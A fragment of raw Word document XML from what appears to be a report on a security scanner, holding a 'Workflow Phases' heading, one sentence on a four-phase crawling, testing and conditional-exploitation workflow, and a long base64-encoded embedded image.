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4.1.3.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Workflow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Phases</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="34" w:name="workflow-phases"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.3.2 Workflow Phases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The scanner implements a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4-phase operational workflow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> combining crawling, testing, and conditional exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="2686050" cy="89820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